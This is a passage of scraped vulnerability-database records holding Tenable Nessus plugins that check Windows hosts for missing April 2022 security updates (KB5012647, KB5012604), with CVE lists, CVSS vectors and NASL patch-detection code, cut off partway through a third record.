"type": "nessus", "title": "KB5012647: Windows 10 version 1809 / Windows Server 2019 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-24474", "CVE-2022-24479", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24484", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24487", "CVE-2022-24489", "CVE-2022-24490", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24495", "CVE-2022-24496", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24537", "CVE-2022-24538", "CVE-2022-24539", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24545", "CVE-2022-24546", "CVE-2022-24547", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-26783", "CVE-2022-26784", "CVE-2022-26785", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26789", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26793", "CVE-2022-26794", "CVE-2022-26795", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26816", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26827", "CVE-2022-26828", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26914", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919", "CVE-2022-26920"], "modified": "2022-06-01T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012647.NASL", "href": "https://www.tenable.com/plugins/nessus/159675", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159675);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/01\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-22008\",\n \"CVE-2022-24474\",\n \"CVE-2022-24479\",\n \"CVE-2022-24481\",\n \"CVE-2022-24482\",\n \"CVE-2022-24483\",\n \"CVE-2022-24484\",\n \"CVE-2022-24485\",\n \"CVE-2022-24486\",\n \"CVE-2022-24487\",\n \"CVE-2022-24489\",\n \"CVE-2022-24490\",\n \"CVE-2022-24491\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24495\",\n \"CVE-2022-24496\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24537\",\n \"CVE-2022-24538\",\n \"CVE-2022-24539\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24545\",\n \"CVE-2022-24546\",\n \"CVE-2022-24547\",\n \"CVE-2022-24549\",\n \"CVE-2022-24550\",\n \"CVE-2022-26783\",\n \"CVE-2022-26784\",\n \"CVE-2022-26785\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26789\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26793\",\n \"CVE-2022-26794\",\n \"CVE-2022-26795\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26811\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26814\",\n \"CVE-2022-26815\",\n \"CVE-2022-26816\",\n \"CVE-2022-26817\",\n \"CVE-2022-26818\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26823\",\n \"CVE-2022-26824\",\n \"CVE-2022-26825\",\n \"CVE-2022-26826\",\n \"CVE-2022-26827\",\n \"CVE-2022-26828\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26914\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\",\n \"CVE-2022-26920\"\n );\n script_xref(name:\"MSKB\", value:\"5012647\");\n script_xref(name:\"MSFT\", value:\"MS22-5012647\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012647: Windows 10 version 1809 / Windows Server 2019 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012591.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-26790, CVE-2022-26828, CVE-2022-26827, \n CVE-2022-26807, CVE-2022-26796, CVE-2022-26798, \n CVE-2022-26808, CVE-2022-26810, CVE-2022-26803, \n CVE-2022-26802, CVE-2022-26801, CVE-2022-26794, \n CVE-2022-26792, CVE-2022-26904, CVE-2022-26788, \n CVE-2022-26793, CVE-2022-26914, CVE-2022-26789, \n CVE-2022-26797, CVE-2022-26787, CVE-2022-24549, \n CVE-2022-26795, CVE-2022-26786, CVE-2022-24496, \n CVE-2022-24544, CVE-2022-24540, CVE-2022-24489, \n CVE-2022-24486, CVE-2022-24481, CVE-2022-24479, \n CVE-2022-24527, CVE-2022-24474, CVE-2022-24521, \n CVE-2022-24550, CVE-2022-24499, CVE-2022-24547, \n CVE-2022-24546, CVE-2022-24494, CVE-2022-24542, \n CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26831, \n CVE-2022-26915, CVE-2022-24538, CVE-2022-24484, \n CVE-2022-26784)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-26824, \n CVE-2022-26812, CVE-2022-26919, CVE-2022-26918, \n CVE-2022-26809, CVE-2022-26825, CVE-2022-26916, \n CVE-2022-26819, CVE-2022-26817, CVE-2022-26815, \n CVE-2022-26814, CVE-2022-26823, CVE-2022-26811, \n CVE-2022-26829, CVE-2022-26821, CVE-2022-26917, \n CVE-2022-26820, CVE-2022-26826, CVE-2022-26818, \n CVE-2022-26822, CVE-2022-26813, CVE-2022-24545, \n CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, \n CVE-2022-24537, CVE-2022-24536, CVE-2022-24487, \n CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, \n CVE-2022-26903, CVE-2022-24495, CVE-2022-24528, \n CVE-2022-21983, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-26920, CVE-2022-26816, \n CVE-2022-24493, CVE-2022-24539, CVE-2022-24490, \n CVE-2022-26783, CVE-2022-26785, CVE-2022-24498, \n CVE-2022-24483)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012647\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5012647\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012647'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012647])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-19T17:40:04", "description": "The remote Windows host is missing security update 5012591.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-26786, CVE-2022-26787, CVE-2022-26827, CVE-2022-26789, CVE-2022-26810, CVE-2022-26803, CVE-2022-26802, CVE-2022-26801, CVE-2022-26828, CVE-2022-26808, CVE-2022-26788, CVE-2022-26790, CVE-2022-24549, CVE-2022-26914, CVE-2022-26798, CVE-2022-26795, CVE-2022-26793, CVE-2022-26796, CVE-2022-26904, CVE-2022-26807, CVE-2022-26797, CVE-2022-26794, CVE-2022-26792, CVE-2022-24496, CVE-2022-24544, CVE-2022-24540, CVE-2022-24489, CVE-2022-24488, CVE-2022-24486, CVE-2022-24481, CVE-2022-24479, CVE-2022-24527, CVE-2022-24474, CVE-2022-24521, CVE-2022-24550, CVE-2022-24499, CVE-2022-24547, CVE-2022-24546, CVE-2022-24494, CVE-2022-24542, CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26915, CVE-2022-26831, CVE-2022-24538, CVE-2022-24484, CVE-2022-23268, CVE-2022-26784)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-26917, CVE-2022-26916, CVE-2022-26812, CVE-2022-26811, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26919, CVE-2022-26820, CVE-2022-26830, CVE-2022-26818, CVE-2022-26815, CVE-2022-26809, CVE-2022-26814, CVE-2022-26822, CVE-2022-26829, CVE-2022-26819, CVE-2022-26918, CVE-2022-26826, CVE-2022-26817, CVE-2022-26821, CVE-2022-26813, CVE-2022-24545, CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, CVE-2022-24537, CVE-2022-24536, CVE-2022-24487, CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, CVE-2022-26903, CVE-2022-24495, CVE-2022-24528, CVE-2022-23257, CVE-2022-21983, CVE-2022-22009, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-26816, CVE-2022-26920, CVE-2022-24493, CVE-2022-24539, CVE-2022-24490, CVE-2022-26783, CVE-2022-26785, CVE-2022-24498, CVE-2022-24483)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012604: Windows Server 2022 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-22009", "CVE-2022-23257", "CVE-2022-23268", "CVE-2022-24474", "CVE-2022-24479", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24484", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24487", "CVE-2022-24488", "CVE-2022-24489", "CVE-2022-24490", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24495", "CVE-2022-24496", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24537", "CVE-2022-24538", "CVE-2022-24539", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24545", "CVE-2022-24546", "CVE-2022-24547", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-26783", "CVE-2022-26784", "CVE-2022-26785", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26789", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26793", "CVE-2022-26794", "CVE-2022-26795", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26816", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26827", "CVE-2022-26828", "CVE-2022-26829", "CVE-2022-26830", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26914", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919", "CVE-2022-26920"], "modified": "2022-06-01T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012604.NASL", "href": "https://www.tenable.com/plugins/nessus/159681", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159681);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/01\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-22008\",\n \"CVE-2022-22009\",\n \"CVE-2022-23257\",\n \"CVE-2022-23268\",\n \"CVE-2022-24474\",\n \"CVE-2022-24479\",\n \"CVE-2022-24481\",\n \"CVE-2022-24482\",\n \"CVE-2022-24483\",\n \"CVE-2022-24484\",\n \"CVE-2022-24485\",\n \"CVE-2022-24486\",\n \"CVE-2022-24487\",\n \"CVE-2022-24488\",\n \"CVE-2022-24489\",\n \"CVE-2022-24490\",\n \"CVE-2022-24491\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24495\",\n \"CVE-2022-24496\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24537\",\n \"CVE-2022-24538\",\n \"CVE-2022-24539\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24545\",\n \"CVE-2022-24546\",\n \"CVE-2022-24547\",\n \"CVE-2022-24549\",\n \"CVE-2022-24550\",\n \"CVE-2022-26783\",\n \"CVE-2022-26784\",\n \"CVE-2022-26785\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26789\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26793\",\n \"CVE-2022-26794\",\n \"CVE-2022-26795\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26811\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26814\",\n \"CVE-2022-26815\",\n \"CVE-2022-26816\",\n \"CVE-2022-26817\",\n \"CVE-2022-26818\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26823\",\n \"CVE-2022-26824\",\n \"CVE-2022-26825\",\n \"CVE-2022-26826\",\n \"CVE-2022-26827\",\n \"CVE-2022-26828\",\n \"CVE-2022-26829\",\n \"CVE-2022-26830\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26914\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\",\n \"CVE-2022-26920\"\n );\n script_xref(name:\"MSKB\", value:\"5012604\");\n script_xref(name:\"MSFT\", value:\"MS22-5012604\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012604: Windows Server 2022 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012591.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-26786, CVE-2022-26787, CVE-2022-26827, \n CVE-2022-26789, CVE-2022-26810, CVE-2022-26803, \n CVE-2022-26802, CVE-2022-26801, CVE-2022-26828, \n CVE-2022-26808, CVE-2022-26788, CVE-2022-26790, \n CVE-2022-24549, CVE-2022-26914, CVE-2022-26798, \n CVE-2022-26795, CVE-2022-26793, CVE-2022-26796, \n CVE-2022-26904, CVE-2022-26807, CVE-2022-26797, \n CVE-2022-26794, CVE-2022-26792, CVE-2022-24496, \n CVE-2022-24544, CVE-2022-24540, CVE-2022-24489, \n CVE-2022-24488, CVE-2022-24486, CVE-2022-24481, \n CVE-2022-24479, CVE-2022-24527, CVE-2022-24474, \n CVE-2022-24521, CVE-2022-24550, CVE-2022-24499, \n CVE-2022-24547, CVE-2022-24546, CVE-2022-24494, \n CVE-2022-24542, CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26915, \n CVE-2022-26831, CVE-2022-24538, CVE-2022-24484, \n CVE-2022-23268, CVE-2022-26784)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-26917, \n CVE-2022-26916, CVE-2022-26812, CVE-2022-26811, \n CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, \n CVE-2022-26919, CVE-2022-26820, CVE-2022-26830, \n CVE-2022-26818, CVE-2022-26815, CVE-2022-26809, \n CVE-2022-26814, CVE-2022-26822, CVE-2022-26829, \n CVE-2022-26819, CVE-2022-26918, CVE-2022-26826, \n CVE-2022-26817, CVE-2022-26821, CVE-2022-26813, \n CVE-2022-24545, CVE-2022-24541, CVE-2022-24492, \n CVE-2022-24491, CVE-2022-24537, CVE-2022-24536, \n CVE-2022-24487, CVE-2022-24534, CVE-2022-24485, \n CVE-2022-24533, CVE-2022-26903, CVE-2022-24495, \n CVE-2022-24528, CVE-2022-23257, CVE-2022-21983, \n CVE-2022-22009, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-26816, CVE-2022-26920, \n CVE-2022-24493, CVE-2022-24539, CVE-2022-24490, \n CVE-2022-26783, CVE-2022-26785, CVE-2022-24498, \n CVE-2022-24483)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012604\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5012604\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012604'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'20348',\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012604])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-19T17:41:21", "description": "The remote Windows host is missing security update 5012591.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-26789, CVE-2022-26786, CVE-2022-26802, CVE-2022-26803, CVE-2022-26801, CVE-2022-26796, CVE-2022-26787, CVE-2022-26797, CVE-2022-26827, CVE-2022-26810, CVE-2022-26808, CVE-2022-26798, CVE-2022-24549, CVE-2022-26795, CVE-2022-26791, CVE-2022-26794, CVE-2022-26904, CVE-2022-26792, CVE-2022-26807, CVE-2022-26788, CVE-2022-26828, CVE-2022-26790, CVE-2022-26914, CVE-2022-26793, CVE-2022-24496, CVE-2022-24544, CVE-2022-24540, CVE-2022-24489, CVE-2022-24488, CVE-2022-24486, CVE-2022-24481, CVE-2022-24479, CVE-2022-24527, CVE-2022-24474, CVE-2022-24521, CVE-2022-24550, CVE-2022-24499, CVE-2022-24547, CVE-2022-24546, CVE-2022-24494, CVE-2022-24542, CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26831, CVE-2022-26915, CVE-2022-24538, CVE-2022-24484, CVE-2022-26784)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-26917, CVE-2022-26916, CVE-2022-26812, CVE-2022-26811, CVE-2022-26919, CVE-2022-26823, CVE-2022-26809, CVE-2022-26824, CVE-2022-26818, CVE-2022-26815, CVE-2022-26814, CVE-2022-26822, CVE-2022-26918, CVE-2022-26829, CVE-2022-26820, CVE-2022-26826, CVE-2022-26819, CVE-2022-26825, CVE-2022-26817, CVE-2022-26821, CVE-2022-26813, CVE-2022-24545, CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, CVE-2022-24537, CVE-2022-24536, CVE-2022-24487, CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, CVE-2022-26903, CVE-2022-24495, CVE-2022-24528, CVE-2022-23257, CVE-2022-21983, CVE-2022-22009, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-26816, CVE-2022-26920, CVE-2022-24493, CVE-2022-24539, CVE-2022-24490, CVE-2022-26783, CVE-2022-26785, CVE-2022-24498, CVE-2022-24483)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012599: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-22009", "CVE-2022-23257", "CVE-2022-24474", "CVE-2022-24479", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24484", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24487", "CVE-2022-24488", "CVE-2022-24489", "CVE-2022-24490", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24495", "CVE-2022-24496", 